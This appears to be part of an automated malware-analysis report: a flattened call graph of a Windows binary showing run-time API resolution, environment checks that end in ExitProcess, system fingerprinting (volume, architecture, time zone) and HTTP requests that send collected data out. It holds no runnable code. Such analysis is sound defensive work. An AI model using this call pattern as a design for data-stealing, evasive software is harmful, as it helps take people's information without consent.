14340->14341 14342 ec39bf 14341->14342 14343 ec45c0 2 API calls 14342->14343 14344 ec39d8 14343->14344 14345 ec45c0 2 API calls 14344->14345 14346 ec39f1 14345->14346 14347 ec45c0 2 API calls 14346->14347 14348 ec3a0a 14347->14348 14349 ec45c0 2 API calls 14348->14349 14350 ec3a23 14349->14350 14351 ec45c0 2 API calls 14350->14351 14352 ec3a3c 14351->14352 14353 ec45c0 2 API calls 14352->14353 14354 ec3a55 14353->14354 14355 ec45c0 2 API calls 14354->14355 14356 ec3a6e 14355->14356 14357 ec45c0 2 API calls 14356->14357 14358 ec3a87 14357->14358 14359 ec45c0 2 API calls 14358->14359 14360 ec3aa0 14359->14360 14361 ec45c0 2 API calls 14360->14361 14362 ec3ab9 14361->14362 14363 ec45c0 2 API calls 14362->14363 14364 ec3ad2 14363->14364 14365 ec45c0 2 API calls 14364->14365 14366 ec3aeb 14365->14366 14367 ec45c0 2 API calls 14366->14367 14368 ec3b04 14367->14368 14369 ec45c0 2 API calls 14368->14369 14370 ec3b1d 14369->14370 14371 ec45c0 2 API calls 14370->14371 14372 ec3b36 14371->14372 14373 ec45c0 2 API calls 14372->14373 14374 ec3b4f 14373->14374 14375 ec45c0 2 API calls 14374->14375 14376 ec3b68 14375->14376 14377 ec45c0 2 API calls 14376->14377 14378 ec3b81 14377->14378 14379 ec45c0 2 API calls 14378->14379 14380 ec3b9a 14379->14380 14381 ec45c0 2 API calls 14380->14381 14382 ec3bb3 14381->14382 14383 ec45c0 2 API calls 14382->14383 14384 ec3bcc 14383->14384 14385 ec45c0 2 API calls 14384->14385 14386 ec3be5 14385->14386 14387 ec45c0 2 API calls 14386->14387 14388 ec3bfe 14387->14388 14389 ec45c0 2 API calls 14388->14389 14390 ec3c17 14389->14390 14391 ec45c0 2 API calls 14390->14391 14392 ec3c30 14391->14392 14393 ec45c0 2 API calls 14392->14393 14394 ec3c49 14393->14394 14395 ec45c0 2 API calls 14394->14395 14396 ec3c62 14395->14396 14397 ec45c0 2 API calls 14396->14397 14398 ec3c7b 14397->14398 14399 ec45c0 2 API calls 14398->14399 14400 ec3c94 14399->14400 14401 ec45c0 2 API calls 14400->14401 14402 ec3cad 14401->14402 14403 ec45c0 2 API calls 14402->14403 14404 ec3cc6 14403->14404 14405 ec45c0 2 API calls 14404->14405 14406 ec3cdf 14405->14406 14407 ec45c0 2 API calls 14406->14407 14408 ec3cf8 14407->14408 14409 ec45c0 2 API calls 14408->14409 14410 ec3d11 14409->14410 14411 ec45c0 2 API calls 14410->14411 14412 ec3d2a 14411->14412 14413 ec45c0 2 API calls 14412->14413 14414 ec3d43 14413->14414 14415 ec45c0 2 API calls 14414->14415 14416 ec3d5c 14415->14416 14417 ec45c0 2 API calls 14416->14417 14418 ec3d75 14417->14418 14419 ec45c0 2 API calls 14418->14419 14420 ec3d8e 14419->14420 14421 ec45c0 2 API calls 14420->14421 14422 ec3da7 14421->14422 14423 ec45c0 2 API calls 14422->14423 14424 ec3dc0 14423->14424 14425 ec45c0 2 API calls 14424->14425 14426 ec3dd9 14425->14426 14427 ec45c0 2 API calls 14426->14427 14428 ec3df2 14427->14428 14429 ec45c0 2 API calls 14428->14429 14430 ec3e0b 14429->14430 14431 ec45c0 2 API calls 14430->14431 14432 ec3e24 14431->14432 14433 ec45c0 2 API calls 14432->14433 14434 ec3e3d 14433->14434 14435 ec45c0 2 API calls 14434->14435 14436 ec3e56 14435->14436 14437 ec45c0 2 API calls 14436->14437 14438 ec3e6f 14437->14438 14439 ec45c0 2 API calls 14438->14439 14440 ec3e88 14439->14440 14441 ec45c0 2 API calls 14440->14441 14442 ec3ea1 14441->14442 14443 ec45c0 2 API calls 14442->14443 14444 ec3eba 14443->14444 14445 ec45c0 2 API calls 14444->14445 14446 ec3ed3 14445->14446 14447 ec45c0 2 API calls 14446->14447 14448 ec3eec 14447->14448 14449 ec45c0 2 API calls 14448->14449 14450 ec3f05 14449->14450 14451 ec45c0 2 API calls 14450->14451 14452 ec3f1e 14451->14452 14453 ec45c0 2 API calls 14452->14453 14454 ec3f37 14453->14454 14455 ec45c0 2 API calls 14454->14455 14456 ec3f50 14455->14456 14457 ec45c0 2 API calls 14456->14457 14458 ec3f69 14457->14458 14459 ec45c0 2 API calls 14458->14459 14460 ec3f82 14459->14460 14461 ec45c0 2 API calls 14460->14461 14462 ec3f9b 14461->14462 14463 ec45c0 2 API calls 14462->14463 14464 ec3fb4 14463->14464 14465 ec45c0 2 API calls 14464->14465 14466 ec3fcd 14465->14466 14467 ec45c0 2 API calls 14466->14467 14468 ec3fe6 14467->14468 14469 ec45c0 2 API calls 14468->14469 14470 ec3fff 14469->14470 14471 ec45c0 2 API calls 14470->14471 14472 ec4018 14471->14472 14473 ec45c0 2 API calls 14472->14473 14474 ec4031 14473->14474 14475 ec45c0 2 API calls 14474->14475 14476 ec404a 14475->14476 14477 ec45c0 2 API calls 14476->14477 14478 ec4063 14477->14478 14479 ec45c0 2 API calls 14478->14479 14480 ec407c 14479->14480 14481 ec45c0 2 API calls 14480->14481 14482 ec4095 14481->14482 14483 ec45c0 2 API calls 14482->14483 14484 ec40ae 14483->14484 14485 ec45c0 2 API calls 14484->14485 14486 ec40c7 14485->14486 14487 ec45c0 2 API calls 14486->14487 14488 ec40e0 14487->14488 14489 ec45c0 2 API calls 14488->14489 14490 ec40f9 14489->14490 14491 ec45c0 2 API calls 14490->14491 14492 ec4112 14491->14492 14493 ec45c0 2 API calls 14492->14493 14494 ec412b 14493->14494 14495 ec45c0 2 API calls 14494->14495 14496 ec4144 14495->14496 14497 ec45c0 2 API calls 14496->14497 14498 ec415d 14497->14498 14499 ec45c0 2 API calls 14498->14499 14500 ec4176 14499->14500 14501 ec45c0 2 API calls 14500->14501 14502 ec418f 14501->14502 14503 ec45c0 2 API calls 14502->14503 14504 ec41a8 14503->14504 14505 ec45c0 2 API calls 14504->14505 14506 ec41c1 14505->14506 14507 ec45c0 2 API calls 14506->14507 14508 ec41da 14507->14508 14509 ec45c0 2 API calls 14508->14509 14510 ec41f3 14509->14510 14511 ec45c0 2 API calls 14510->14511 14512 ec420c 14511->14512 14513 ec45c0 2 API calls 14512->14513 14514 ec4225 14513->14514 14515 ec45c0 2 API calls 14514->14515 14516 ec423e 14515->14516 14517 ec45c0 2 API calls 14516->14517 14518 ec4257 14517->14518 14519 ec45c0 2 API calls 14518->14519 14520 ec4270 14519->14520 14521 ec45c0 2 API calls 14520->14521 14522 ec4289 14521->14522 14523 ec45c0 2 API calls 14522->14523 14524 ec42a2 14523->14524 14525 ec45c0 2 API calls 14524->14525 14526 ec42bb 14525->14526 14527 ec45c0 2 API calls 14526->14527 14528 ec42d4 14527->14528 14529 ec45c0 2 API calls 14528->14529 14530 ec42ed 14529->14530 14531 ec45c0 2 API calls 14530->14531 14532 ec4306 14531->14532 14533 ec45c0 2 API calls 14532->14533 14534 ec431f 14533->14534 14535 ec45c0 2 API calls 14534->14535 14536 ec4338 14535->14536 14537 ec45c0 2 API calls 14536->14537 14538 ec4351 14537->14538 14539 ec45c0 2 API calls 14538->14539 14540 ec436a 14539->14540 14541 ec45c0 2 API calls 14540->14541 14542 ec4383 14541->14542 14543 ec45c0 2 API calls 14542->14543 14544 ec439c 14543->14544 14545 ec45c0 2 API calls 14544->14545 14546 ec43b5 14545->14546 14547 ec45c0 2 API calls 14546->14547 14548 ec43ce 14547->14548 14549 ec45c0 2 API calls 14548->14549 14550 ec43e7 14549->14550 14551 ec45c0 2 API calls 14550->14551 14552 ec4400 14551->14552 14553 ec45c0 2 API calls 14552->14553 14554 ec4419 14553->14554 14555 ec45c0 2 API calls 14554->14555 14556 ec4432 14555->14556 14557 ec45c0 2 API calls 14556->14557 14558 ec444b 14557->14558 14559 ec45c0 2 API calls 14558->14559 14560 ec4464 14559->14560 14561 ec45c0 2 API calls 14560->14561 14562 ec447d 14561->14562 14563 ec45c0 2 API calls 14562->14563 14564 ec4496 14563->14564 14565 ec45c0 2 API calls 14564->14565 14566 ec44af 14565->14566 14567 ec45c0 2 API calls 14566->14567 14568 ec44c8 14567->14568 14569 ec45c0 2 API calls 14568->14569 14570 ec44e1 14569->14570 14571 ec45c0 2 API calls 14570->14571 14572 ec44fa 14571->14572 14573 ec45c0 2 API calls 14572->14573 14574 ec4513 14573->14574 14575 ec45c0 2 API calls 14574->14575 14576 ec452c 14575->14576 14577 ec45c0 2 API calls 14576->14577 14578 ec4545 14577->14578 14579 ec45c0 2 API calls 14578->14579 14580 ec455e 14579->14580 14581 ec45c0 2 API calls 14580->14581 14582 ec4577 14581->14582 14583 ec45c0 2 API calls 14582->14583 14584 ec4590 14583->14584 14585 ec45c0 2 API calls 14584->14585 14586 ec45a9 14585->14586 14587 ed9c10 14586->14587 14588 eda036 8 API calls 14587->14588 14589 ed9c20 43 API calls 14587->14589 14590 eda0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14588->14590 14591 eda146 14588->14591 14589->14588 14590->14591 14592 eda216 14591->14592 14593 eda153 8 API calls 14591->14593 14594 eda21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14594 14595 eda298 14592->14595 14593->14592 14594->14595 14596 eda2a5 6 API calls 14595->14596 14597 eda337 14595->14597 14596->14597 14598 eda41f 14597->14598 14599 eda344 9 API calls 14597->14599 14600 eda428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14598->14600 14601 eda4a2 14598->14601 14599->14598 14600->14601 14602 eda4dc 14601->14602 14603 eda4ab GetProcAddress GetProcAddress 14601->14603 14604 eda515 14602->14604 14605 eda4e5 GetProcAddress GetProcAddress 14602->14605 14603->14602 14606 eda612 14604->14606 14607 eda522 10 API calls 14604->14607 14605->14604 14608 eda67d 14606->14608 14609 eda61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14606->14609 14607->14606 14610 eda69e 14608->14610 14611 eda686 GetProcAddress 14608->14611 14609->14608 14612 ed5ca3 14610->14612 14613 eda6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14610->14613 14611->14610 14614 ec1590 14612->14614 14613->14612 15733 ec1670 14614->15733 14617 eda7a0 lstrcpy 14618 ec15b5 14617->14618 14619 eda7a0 lstrcpy 14618->14619 14620 ec15c7 14619->14620 14621 eda7a0 lstrcpy 14620->14621 14622 ec15d9 14621->14622 14623 eda7a0 lstrcpy 14622->14623 14624 ec1663 14623->14624 14625 ed5510 14624->14625 14626 ed5521 14625->14626 14627 eda820 2 API calls 14626->14627 14628 ed552e 14627->14628 14629 eda820 2 API calls 14628->14629 14630 ed553b 14629->14630 14631 eda820 2 API calls 14630->14631 14632 ed5548 14631->14632 14633 eda740 lstrcpy 14632->14633 14634 ed5555 14633->14634 14635 eda740 lstrcpy 14634->14635 14636 ed5562 14635->14636 14637 eda740 lstrcpy 14636->14637 14638 ed556f 14637->14638 14639 eda740 lstrcpy 14638->14639 14652 ed557c 14639->14652 14640 eda820 lstrlen lstrcpy 14640->14652 14641 eda740 lstrcpy 14641->14652 14642 eda8a0 lstrcpy 14642->14652 14643 ed5643 StrCmpCA 14643->14652 14644 ed56a0 StrCmpCA 14645 ed57dc 14644->14645 14644->14652 14647 eda8a0 lstrcpy 14645->14647 14646 eda7a0 lstrcpy 14646->14652 14648 ed57e8 14647->14648 14649 eda820 2 API calls 14648->14649 14650 ed57f6 14649->14650 14653 eda820 2 API calls 14650->14653 14651 ed5856 StrCmpCA 14651->14652 14654 ed5991 14651->14654 14652->14640 14652->14641 14652->14642 14652->14643 14652->14644 14652->14646 14652->14651 14660 ed51f0 20 API calls 14652->14660 14662 ed5a0b StrCmpCA 14652->14662 14663 ed52c0 25 API calls 14652->14663 14675 ed578a StrCmpCA 14652->14675 14678 ed593f StrCmpCA 14652->14678 14679 ec1590 lstrcpy 14652->14679 14656 ed5805 14653->14656 14655 eda8a0 lstrcpy 14654->14655 14657 ed599d 14655->14657 14658 ec1670 lstrcpy 14656->14658 14659 eda820 2 API calls 14657->14659 14677 ed5811 14658->14677 14661 ed59ab 14659->14661 14660->14652 14664 eda820 2 API calls 14661->14664 14665 ed5a28 14662->14665 14666 ed5a16 Sleep 14662->14666 14663->14652 14667 ed59ba 14664->14667 14668 eda8a0 lstrcpy 14665->14668 14666->14652 14669 ec1670 lstrcpy 14667->14669 14670 ed5a34 14668->14670 14669->14677 14671 eda820 2 API calls 14670->14671 14672 ed5a43 14671->14672 14673 eda820 2 API calls 14672->14673 14674 ed5a52 14673->14674 14676 ec1670 lstrcpy 14674->14676 14675->14652 14676->14677 14677->13732 14678->14652 14679->14652 14681 ed754c 14680->14681 14682 ed7553 GetVolumeInformationA 14680->14682 14681->14682 14683 ed7591 14682->14683 14684 ed75fc GetProcessHeap RtlAllocateHeap 14683->14684 14685 ed7619 14684->14685 14686 ed7628 wsprintfA 14684->14686 14687 eda740 lstrcpy 14685->14687 14688 eda740 lstrcpy 14686->14688 14689 ed5da7 14687->14689 14688->14689 14689->13753 14691 eda7a0 lstrcpy 14690->14691 14692 ec4899 14691->14692 15742 ec47b0 14692->15742 14694 ec48a5 14695 eda740 lstrcpy 14694->14695 14696 ec48d7 14695->14696 14697 eda740 lstrcpy 14696->14697 14698 ec48e4 14697->14698 14699 eda740 lstrcpy 14698->14699 14700 ec48f1 14699->14700 14701 eda740 lstrcpy 14700->14701 14702 ec48fe 14701->14702 14703 eda740 lstrcpy 14702->14703 14704 ec490b InternetOpenA StrCmpCA 14703->14704 14705 ec4944 14704->14705 14706 ec4ecb InternetCloseHandle 14705->14706 15748 ed8b60 14705->15748 14708 ec4ee8 14706->14708 15763 ec9ac0 CryptStringToBinaryA 14708->15763 14709 ec4963 15756 eda920 14709->15756 14712 ec4976 14714 eda8a0 lstrcpy 14712->14714 14719 ec497f 14714->14719 14715 eda820 2 API calls 14716 ec4f05 14715->14716 14718 eda9b0 4 API calls 14716->14718 14717 ec4f27 ctype 14721 eda7a0 lstrcpy 14717->14721 14720 ec4f1b 14718->14720 14723 eda9b0 4 API calls 14719->14723 14722 eda8a0 lstrcpy 14720->14722 14734 ec4f57 14721->14734 14722->14717 14724 ec49a9 14723->14724 14725 eda8a0 lstrcpy 14724->14725 14726 ec49b2 14725->14726 14727 eda9b0 4 API calls 14726->14727 14728 ec49d1 14727->14728 14729 eda8a0 lstrcpy 14728->14729 14730 ec49da 14729->14730 14731 eda920 3 API calls 14730->14731 14732 ec49f8 14731->14732 14733 eda8a0 lstrcpy 14732->14733 14735 ec4a01 14733->14735 14734->13756 14736 eda9b0 4 API calls 14735->14736 14737 ec4a20 14736->14737 14738 eda8a0 lstrcpy 14737->14738 14739 ec4a29 14738->14739 14740 eda9b0 4 API calls 14739->14740 14741 ec4a48 14740->14741 14742 eda8a0 lstrcpy 14741->14742 14743 ec4a51 14742->14743 14744 eda9b0 4 API calls 14743->14744 14745 ec4a7d 14744->14745 14746 eda920 3 API calls 14745->14746 14747 ec4a84 14746->14747 14748 eda8a0 lstrcpy 14747->14748 14749 ec4a8d 14748->14749 14750 ec4aa3 InternetConnectA 14749->14750 14750->14706 14751 ec4ad3 HttpOpenRequestA 14750->14751 14753 ec4ebe InternetCloseHandle 14751->14753 14754 ec4b28 14751->14754 14753->14706 14755 eda9b0 4 API calls 14754->14755 14756 ec4b3c 14755->14756 14757 eda8a0 lstrcpy 14756->14757 14758 ec4b45 14757->14758 14759 eda920 3 API calls 14758->14759 14760 ec4b63 14759->14760 14761 eda8a0 lstrcpy 14760->14761 14762 ec4b6c 14761->14762 14763 eda9b0 4 API calls 14762->14763 14764 ec4b8b 14763->14764 14765 eda8a0 lstrcpy 14764->14765 14766 ec4b94 14765->14766 14767 eda9b0 4 API calls 14766->14767 14768 ec4bb5 14767->14768 14769 eda8a0 lstrcpy 14768->14769 14770 ec4bbe 14769->14770 14771 eda9b0 4 API calls 14770->14771 14772 ec4bde 14771->14772 14773 eda8a0 lstrcpy 14772->14773 14774 ec4be7 14773->14774 14775 eda9b0 4 API calls 14774->14775 14776 ec4c06 14775->14776 14777 eda8a0 lstrcpy 14776->14777 14778 ec4c0f 14777->14778 14779 eda920 3 API calls 14778->14779 14780 ec4c2d 14779->14780 14781 eda8a0 lstrcpy 14780->14781 14782 ec4c36 14781->14782 14783 eda9b0 4 API calls 14782->14783 14784 ec4c55 14783->14784 14785 eda8a0 lstrcpy 14784->14785 14786 ec4c5e 14785->14786 14787 eda9b0 4 API calls 14786->14787 14788 ec4c7d 14787->14788 14789 eda8a0 lstrcpy 14788->14789 14790 ec4c86 14789->14790 14791 eda920 3 API calls 14790->14791 14792 ec4ca4 14791->14792 14793 eda8a0 lstrcpy 14792->14793 14794 ec4cad 14793->14794 14795 eda9b0 4 API calls 14794->14795 14796 ec4ccc 14795->14796 14797 eda8a0 lstrcpy 14796->14797 14798 ec4cd5 14797->14798 14799 eda9b0 4 API calls 14798->14799 14800 ec4cf6 14799->14800 14801 eda8a0 lstrcpy 14800->14801 14802 ec4cff 14801->14802 14803 eda9b0 4 API calls 14802->14803 14804 ec4d1f 14803->14804 14805 eda8a0 lstrcpy 14804->14805 14806 ec4d28 14805->14806 14807 eda9b0 4 API calls 14806->14807 14808 ec4d47 14807->14808 14809 eda8a0 lstrcpy 14808->14809 14810 ec4d50 14809->14810 14811 eda920 3 API calls 14810->14811 14812 ec4d6e 14811->14812 14813 eda8a0 lstrcpy 14812->14813 14814 ec4d77 14813->14814 14815 eda740 lstrcpy 14814->14815 14816 ec4d92 14815->14816 14817 eda920 3 API calls 14816->14817 14818 ec4db3 14817->14818 14819 eda920 3 API calls 14818->14819 14820 ec4dba 14819->14820 14821 eda8a0 lstrcpy 14820->14821 14822 ec4dc6 14821->14822 14823 ec4de7 lstrlen 14822->14823 14824 ec4dfa 14823->14824 14825 ec4e03 lstrlen 14824->14825 15762 edaad0 14825->15762 14827 ec4e13 HttpSendRequestA 14828 ec4e32 InternetReadFile 14827->14828 14829 ec4e67 InternetCloseHandle 14828->14829 14834 ec4e5e 14828->14834 14831 eda800 14829->14831 14831->14753 14832 eda9b0 4 API calls 14832->14834 14833 eda8a0 lstrcpy 14833->14834 14834->14828 14834->14829 14834->14832 14834->14833 15769 edaad0 14835->15769 14837 ed17c4 StrCmpCA 14838 ed17cf ExitProcess 14837->14838 14842 ed17d7 14837->14842 14839 ed19c2 14839->13758 14840 ed18ad StrCmpCA 14840->14842 14841 ed18cf StrCmpCA 14841->14842 14842->14839 14842->14840 14842->14841 14843 ed185d StrCmpCA 14842->14843 14844 ed187f StrCmpCA 14842->14844 14845 ed18f1 StrCmpCA 14842->14845 14846 ed1951 StrCmpCA 14842->14846 14847 ed1970 StrCmpCA 14842->14847 14848 ed1913 StrCmpCA 14842->14848 14849 ed1932 StrCmpCA 14842->14849 14850 eda820 lstrlen lstrcpy 14842->14850 14843->14842 14844->14842 14845->14842 14846->14842 14847->14842 14848->14842 14849->14842 14850->14842 14852 eda7a0 lstrcpy 14851->14852 14853 ec5979 14852->14853 14854 ec47b0 2 API calls 14853->14854 14855 ec5985 14854->14855 14856 eda740 lstrcpy 14855->14856 14857 ec59ba 14856->14857 14858 eda740 lstrcpy 14857->14858 14859 ec59c7 14858->14859 14860 eda740 lstrcpy 14859->14860 14861 ec59d4 14860->14861 14862 eda740 lstrcpy 14861->14862 14863 ec59e1 14862->14863 14864 eda740 lstrcpy 14863->14864 14865 ec59ee InternetOpenA StrCmpCA 14864->14865 14866 ec5a1d 14865->14866 14867 ec5fc3 InternetCloseHandle 14866->14867 14868 ed8b60 3 API calls 14866->14868 14869 ec5fe0 14867->14869 14870 ec5a3c 14868->14870 14871 ec9ac0 4 API calls 14869->14871 14872 eda920 3 API calls 14870->14872 14873 ec5fe6 14871->14873 14874 ec5a4f 14872->14874 14876 eda820 2 API calls 14873->14876 14879 ec601f ctype 14873->14879 14875 eda8a0 lstrcpy 14874->14875 14880 ec5a58 14875->14880 14877 ec5ffd 14876->14877 14878 eda9b0 4 API calls 14877->14878 14881 ec6013 14878->14881 14882 eda7a0 lstrcpy 14879->14882 14884 eda9b0 4 API calls 14880->14884 14883 eda8a0 lstrcpy 14881->14883 14893 ec604f 14882->14893 14883->14879 14885 ec5a82 14884->14885 14886 eda8a0 lstrcpy 14885->14886 14887 ec5a8b 14886->14887 14888 eda9b0 4 API calls 14887->14888 14889 ec5aaa 14888->14889 14890 eda8a0 lstrcpy 14889->14890 14891 ec5ab3 14890->14891 14892 eda920 3 API calls 14891->14892 14894 ec5ad1 14892->14894 14893->13764 14895 eda8a0 lstrcpy 14894->14895 14896 ec5ada 14895->14896 14897 eda9b0 4 API calls 14896->14897 14898 ec5af9 14897->14898 14899 eda8a0 lstrcpy 14898->14899 14900 ec5b02 14899->14900 14901 eda9b0 4 API calls 14900->14901 14902 ec5b21 14901->14902 14903 eda8a0 lstrcpy 14902->14903 14904 ec5b2a 14903->14904 14905 eda9b0 4 API calls 14904->14905 14906 ec5b56 14905->14906 14907 eda920 3 API calls 14906->14907 14908 ec5b5d 14907->14908 14909 eda8a0 lstrcpy 14908->14909 14910 ec5b66 14909->14910 14911 ec5b7c InternetConnectA 14910->14911 14911->14867 14912 ec5bac HttpOpenRequestA 14911->14912 14914 ec5c0b 14912->14914 14915 ec5fb6 InternetCloseHandle 14912->14915 14916 eda9b0 4 API calls 14914->14916 14915->14867 14917 ec5c1f 14916->14917 14918 eda8a0 lstrcpy 14917->14918 14919 ec5c28 14918->14919 14920 eda920 3 API calls 14919->14920 14921 ec5c46 14920->14921 14922 eda8a0 lstrcpy 14921->14922 14923 ec5c4f 14922->14923 14924 eda9b0 4 API calls 14923->14924 14925 ec5c6e 14924->14925 14926 eda8a0 lstrcpy 14925->14926 14927 ec5c77 14926->14927 14928 eda9b0 4 API calls 14927->14928 14929 ec5c98 14928->14929 14930 eda8a0 lstrcpy 14929->14930 14931 ec5ca1 14930->14931 14932 eda9b0 4 API calls 14931->14932 14933 ec5cc1 14932->14933 14934 eda8a0 lstrcpy 14933->14934 14935 ec5cca 14934->14935 14936 eda9b0 4 API calls 14935->14936 14937 ec5ce9 14936->14937 14938 eda8a0 lstrcpy 14937->14938 14939 ec5cf2 14938->14939 14940 eda920 3 API calls 14939->14940 14941 ec5d10 14940->14941 14942 eda8a0 lstrcpy 14941->14942 14943 ec5d19 14942->14943 14944 eda9b0 4 API calls 14943->14944 14945 ec5d38 14944->14945 14946 eda8a0 lstrcpy 14945->14946 14947 ec5d41 14946->14947 14948 eda9b0 4 API calls 14947->14948 14949 ec5d60 14948->14949 14950 eda8a0 lstrcpy 14949->14950 14951 ec5d69 14950->14951 14952 eda920 3 API calls 14951->14952 14953 ec5d87 14952->14953 14954 eda8a0 lstrcpy 14953->14954 14955 ec5d90 14954->14955 14956 eda9b0 4 API calls 14955->14956 14957 ec5daf 14956->14957 14958 eda8a0 lstrcpy 14957->14958 14959 ec5db8 14958->14959 14960 eda9b0 4 API calls 14959->14960 14961 ec5dd9 14960->14961 14962 eda8a0 lstrcpy 14961->14962 14963 ec5de2 14962->14963 14964 eda9b0 4 API calls 14963->14964 14965 ec5e02 14964->14965 14966 eda8a0 lstrcpy 14965->14966 14967 ec5e0b 14966->14967 14968 eda9b0 4 API calls 14967->14968 14969 ec5e2a 14968->14969 14970 eda8a0 lstrcpy 14969->14970 14971 ec5e33 14970->14971 14972 eda920 3 API calls 14971->14972 14973 ec5e54 14972->14973 14974 eda8a0 lstrcpy 14973->14974 14975 ec5e5d 14974->14975 14976 ec5e70 lstrlen 14975->14976 15770 edaad0 14976->15770 14978 ec5e81 lstrlen GetProcessHeap RtlAllocateHeap 15771 edaad0 14978->15771 14980 ec5eae lstrlen 14981 ec5ebe 14980->14981 14982 ec5ed7 lstrlen 14981->14982 14983 ec5ee7 14982->14983 14984 ec5ef0 lstrlen 14983->14984 14985 ec5f03 14984->14985 14986 ec5f1a lstrlen 14985->14986 15772 edaad0 14986->15772 14988 ec5f2a HttpSendRequestA 14989 ec5f35 InternetReadFile 14988->14989 14990 ec5f6a InternetCloseHandle 14989->14990 14994 ec5f61 14989->14994 14990->14915 14992 eda9b0 4 API calls 14992->14994 14993 eda8a0 lstrcpy 14993->14994 14994->14989 14994->14990 14994->14992 14994->14993 14997 ed1077 14995->14997 14996 ed1151 14996->13766 14997->14996 14998 eda820 lstrlen lstrcpy 14997->14998 14998->14997 15000 ed0db7 14999->15000 15001 ed0f17 15000->15001 15002 ed0ea4 StrCmpCA 15000->15002 15003 ed0e27 StrCmpCA 15000->15003 15004 ed0e67 StrCmpCA 15000->15004 15005 eda820 lstrlen lstrcpy 15000->15005 15001->13774 15002->15000 15003->15000 15004->15000 15005->15000 15007 ed0f67 15006->15007 15008 ed1044 15007->15008 15009 ed0fb2 StrCmpCA 15007->15009 15010 eda820 lstrlen lstrcpy 15007->15010 15008->13782 15009->15007 15010->15007 15012 eda740 lstrcpy 15011->15012 15013 ed1a26 15012->15013 15014 eda9b0 4 API calls 15013->15014 15015 ed1a37 15014->15015 15016 eda8a0 lstrcpy 15015->15016 15017 ed1a40 15016->15017 15018 eda9b0 4 API calls 15017->15018 15019 ed1a5b 15018->15019 15020 eda8a0 lstrcpy 15019->15020 15021 ed1a64 15020->15021 15022 eda9b0 4 API calls 15021->15022 15023 ed1a7d 15022->15023 15024 eda8a0 lstrcpy 15023->15024 15025 ed1a86 15024->15025 15026 eda9b0 4 API calls 15025->15026 15027 ed1aa1 15026->15027 15028 eda8a0 lstrcpy 15027->15028 15029 ed1aaa 15028->15029 15030 eda9b0 4 API calls 15029->15030 15031 ed1ac3 15030->15031 15032 eda8a0 lstrcpy 15031->15032 15033 ed1acc 15032->15033 15034 eda9b0 4 API calls 15033->15034 15035 ed1ae7 15034->15035 15036 eda8a0 lstrcpy 15035->15036 15037 ed1af0 15036->15037 15038 eda9b0 4 API calls 15037->15038 15039 ed1b09 15038->15039 15040 eda8a0 lstrcpy 15039->15040 15041 ed1b12 15040->15041 15042 eda9b0 4 API calls 15041->15042 15043 ed1b2d 15042->15043 15044 eda8a0 lstrcpy 15043->15044 15045 ed1b36 15044->15045 15046 eda9b0 4 API calls 15045->15046 15047 ed1b4f 15046->15047 15048 eda8a0 lstrcpy 15047->15048 15049 ed1b58 15048->15049 15050 eda9b0 4 API calls 15049->15050 15051 ed1b76 15050->15051 15052 eda8a0 lstrcpy 15051->15052 15053 ed1b7f 15052->15053 15054 ed7500 6 API calls 15053->15054 15055 ed1b96 15054->15055 15056 eda920 3 API calls 15055->15056 15057 ed1ba9 15056->15057 15058 eda8a0 lstrcpy 15057->15058 15059 ed1bb2 15058->15059 15060 eda9b0 4 API calls 15059->15060 15061 ed1bdc 15060->15061 15062 eda8a0 lstrcpy 15061->15062 15063 ed1be5 15062->15063 15064 eda9b0 4 API calls 15063->15064 15065 ed1c05 15064->15065 15066 eda8a0 lstrcpy 15065->15066 15067 ed1c0e 15066->15067 15773 ed7690 GetProcessHeap RtlAllocateHeap 15067->15773 15070 eda9b0 4 API calls 15071 ed1c2e 15070->15071 15072 eda8a0 lstrcpy 15071->15072 15073 ed1c37 15072->15073 15074 eda9b0 4 API calls 15073->15074 15075 ed1c56 15074->15075 15076 eda8a0 lstrcpy 15075->15076 15077 ed1c5f 15076->15077 15078 eda9b0 4 API calls 15077->15078 15079 ed1c80 15078->15079 15080 eda8a0 lstrcpy 15079->15080 15081 ed1c89 15080->15081 15780 ed77c0 GetCurrentProcess IsWow64Process 15081->15780 15084 eda9b0 4 API calls 15085 ed1ca9 15084->15085 15086 eda8a0 lstrcpy 15085->15086 15087 ed1cb2 15086->15087 15088 eda9b0 4 API calls 15087->15088 15089 ed1cd1 15088->15089 15090 eda8a0 lstrcpy 15089->15090 15091 ed1cda 15090->15091 15092 eda9b0 4 API calls 15091->15092 15093 ed1cfb 15092->15093 15094 eda8a0 lstrcpy 15093->15094 15095 ed1d04 15094->15095 15096 ed7850 3 API calls 15095->15096 15097 ed1d14 15096->15097 15098 eda9b0 4 API calls 15097->15098 15099 ed1d24 15098->15099 15100 eda8a0 lstrcpy 15099->15100 15101 ed1d2d 15100->15101 15102 eda9b0 4 API calls 15101->15102 15103 ed1d4c 15102->15103 15104 eda8a0 lstrcpy 15103->15104 15105 ed1d55 15104->15105 15106 eda9b0 4 API calls 15105->15106 15107 ed1d75 15106->15107 15108 eda8a0 lstrcpy 15107->15108 15109 ed1d7e 15108->15109 15110 ed78e0 3 API calls 15109->15110 15111 ed1d8e 15110->15111 15112 eda9b0 4 API calls 15111->15112 15113 ed1d9e 15112->15113 15114 eda8a0 lstrcpy 15113->15114 15115 ed1da7 15114->15115 15116 eda9b0 4 API calls 15115->15116 15117 ed1dc6 15116->15117 15118 eda8a0 lstrcpy 15117->15118 15119 ed1dcf 15118->15119 15120 eda9b0 4 API calls 15119->15120 15121 ed1df0 15120->15121 15122 eda8a0 lstrcpy 15121->15122 15123 ed1df9 15122->15123 15782 ed7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15123->15782 15126 eda9b0 4 API calls 15127 ed1e19 15126->15127 15128 eda8a0 lstrcpy 15127->15128 15129 ed1e22 15128->15129 15130 eda9b0 4 API calls 15129->15130 15131 ed1e41 15130->15131 15132 eda8a0 lstrcpy 15131->15132 15133 ed1e4a 15132->15133 15134 eda9b0 4 API calls 15133->15134 15135 ed1e6b 15134->15135 15136 eda8a0 lstrcpy 15135->15136 15137 ed1e74 15136->15137 15784 ed7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15137->15784 15140 eda9b0 4 API calls 15141 ed1e94 15140->15141 15142 eda8a0 lstrcpy 15141->15142 15143 ed1e9d 15142->15143 15144 eda9b0 4 API calls 15143->15144 15145 ed1ebc 15144->15145 15146 eda8a0 